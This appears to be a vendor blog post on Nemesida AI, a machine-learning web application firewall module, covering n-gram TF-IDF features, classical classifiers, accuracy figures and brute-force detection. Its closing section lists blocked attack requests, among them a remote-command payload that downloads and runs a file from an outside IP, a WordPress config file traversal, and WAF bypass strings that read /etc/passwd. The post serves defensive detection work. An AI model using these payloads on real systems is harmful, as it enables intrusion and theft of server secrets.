How we created machine learning module and why we decided to refuse neural networks preferred to classical algorithms, what attacks are detected using Levenshtein distance and how the accuracy of the attack detection is reached.
Looking at the growing popularity of machine learning and knowing that HTTP requests are simple text (sometimes incomprehensible), and the protocol’s syntax allows us to interpret data as lines:
The example of legitimate request:
28/Aug/2018:16:55:24 +0300; 200; 127.0.0.1; http; example.com; GET /login.php HTTP/1.1; PHPSESSID=vqmi2ptvisohf62lru0shg3ll7; Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21; -; -; -----------START-BODY----------- -; -----------END-BODY----------
The example of illegitimate request:
28/Aug/2018:16:55:24 +0300; 200; 127.0.0.1; http; example.com; GET %2Flogin.php%3Fsearch%3D%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1; PHPSESSID=vqmi2ptvisohf62lru0shg3ll7; Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21; -; -; -----------START-BODY----------- -; -----------END-BODY---------
we decided to try implementing a machine learning module (Nemesida AI) to detect attacks on the web-application.
Before starting development, the following task was formulated:
Teach the machine learning module to detect attacks on web-applications using the content of the HTTP request, that is, to make the classification of requests (at least, binary: legitimate or illegitimate request).
Adaptation of the string classification scheme
Using the general string classification scheme, we will perform its analysis and adaptation for our task:
Stage 1. Traffic processing.
Analyze incoming HTTP requests with the ability to block them.
Stage 2. Definition of signs.
The content of HTTP requests is not meaningful text, so to work with it, we use not words, but n-grams (choosing n is also a separate task).
Stages 3 and 4. Filtering.
Stages relate more to meaningful text, so they are not required to solve the problem, we exclude.
Stage 5. Convert to vector view.
Based on the analysis of scientific research and existing prototypes, a scheme of operation of the machine learning module was constructed, and after analyzing the data, a characteristic space of elements was formed. Since most of the signs are textual, they were vectorized for further use in the recognition algorithm. And since the query fields are not separate words, and often consist of sequences of characters, it was decided to use an approach based on n-gram frequency analysis (TF-IDF).
The task of detecting attacks from a mathematical point of view was formalized as a classical classification problem (two classes: legitimate and illegitimate traffic). The choice of algorithms was made according to the criterion of the availability of implementation and the possibility of testing. The gradient boosting algorithm (AdaBoost) showed itself in the best way. Thus, after training, the decision of the Nemesida WAF is made based on the statistical properties of the analyzed data, and not on the basis of deterministic signs (signatures) of attacks. In our case, instead of the «bag of words» we use n-grams.
Stage 6. Selection of a feature dictionary.
Take the result of the algorithm TF-IDF and reduce the number of signs (controlling, for example, the frequency of occurrence parameter).
Stage 7. Algorithm training.
Choose the algorithm and train it. After learning (in recognition), only blocks 1, 5, 6 + recognition are working.
Classical algorithms and deep learning
In Nemesida AI we use classical algorithms of machine learning which don’t require large compute capacity, unlike neural networks.
Deep learning provides high accuracy, but:
- requires a lot of resources, both for the learning process (on the GPU) and for the recognition process (inference can be on the CPU);
- the period of time spent on processing requests significantly exceeds the processing time using classical algorithms.
Whereas not all of potential users of Nemesida WAF will be able to purchase a server with a GPU for deep learning, and query processing time is a key factor, we decided to use classical algorithms which with a good training set, provide accuracy and scale well on any platform.
|Classical algorithms||Multy-layer neural network|
1. High accuracy of a good training set only.
2. There are no high hardware requirements (GPU).
|1. High hardware requirements (GPU).
2. Query interaction time far exceeds the interaction time using classical algorithms.
ML development strategy
During the development the module Nemesida AI the following strategy was used:
- Fix the level of false positives on the value (up to 0.04% for 2017, up to 0.01% for 2018);
- Increase the detection level to the maximum for a given level of false positives.
Based on the chosen strategy, the classifier parameters are selected taking into account the fulfillment of every condition, and the result of solving the problem of forming training samples of two classes based on the vector space model (legitimate traffic and attacks) directly affects the quality of the classifier work.
The training sample of illegitimate traffic is based on the current database of attacks received from different sources, and legitimate traffic is based on requests coming to the protected web-application and recognized by the signature analyzer as legitimate. This approach allows the Nemesida AI training system to adapt to a specific web-application, reducing the number of false positives to a minimum. The volume of the legitimate traffic sample depends on the amount of free RAM of the server on which the machine learning module operates. The recommended parameter for training models is the value of 400.000 requests with 32 GB of free RAM.
Using the optimal value of the coefficients for cross-validation, «Random Forest» method was chosen, which allowed us to achieve the following marks:
- the number of False Positives is 0.01%;
- the number of False Negatives is 0.01%.
Thus, the accuracy of detecting attacks on the web-application module Nemesida AI is 99.98%.
Block brute-force attacks
Nemesida WAF detects brute-force attacks, including distributed ones (using distributed computer networks), and analysis is performed on a copy of requests without increasing the interaction time of the web-application.
There is following principle of the brute-force attacks detection in Nemesida AI:
- Analyze copies of requests received by the web-application.
- Extract necessary data for decision-making.(IP, URL, Args and Body).
- Filter the data, excluding non-target URIs to reduce the number of false positives.
- Сalculate the mutual distances between requests (we chose the Levenshtein distance and fuzzy logic).
- Select requests from one IP to a specific URI as they are close or requests from all IPs to a specific URI (to detect distributed brute-force attacks) within a certain time window.
- Block the source(s) of the attack when thresholds are exceeded.
Nemesida AI module work result
If the training set is good, classical algorithms provide accuracy close to the methods of deep learning, scale well on any platform, and allow detecting distributed brute-force attacks and zero-day attacks with a minimum number of false positives.
Requests are blocked by a combination of characteristics of anomalies:
... URI: /user/password Args: name[#post_render]=printf&name[#markup]=ABCZ%0A UA: Python-urllib/2.7 Cookie: - ...
... ARGS: action=revslider_show_image&img=../wp-config.php Cookies: - ...
... Args: q=user%2Fpassword&name%5B%23markup%5D=cd+%2Ftmp%3Bwget+146.185.X.39%2Flug %3Bperl+lug%3Brm+-rf+lug&name%5B%23type%5D=markup&name%5B%23post_render%5D%5B %5D=passthru UA: python-requests/2.5.3 CPython/3.4.8 Linux/2.6.32-042stab128.2 ...
WAF bypass attempts:
... Body: /?id=1+un/**/ion+sel/**/ect+1,2,3-- ...
... Args: %2f???%2f??t%20%2f???%2fp??s?? ...
... Args: ;+cat+/e't'c/pa'ss'wd ...
... Args: (sy.(st).em)(ls); ...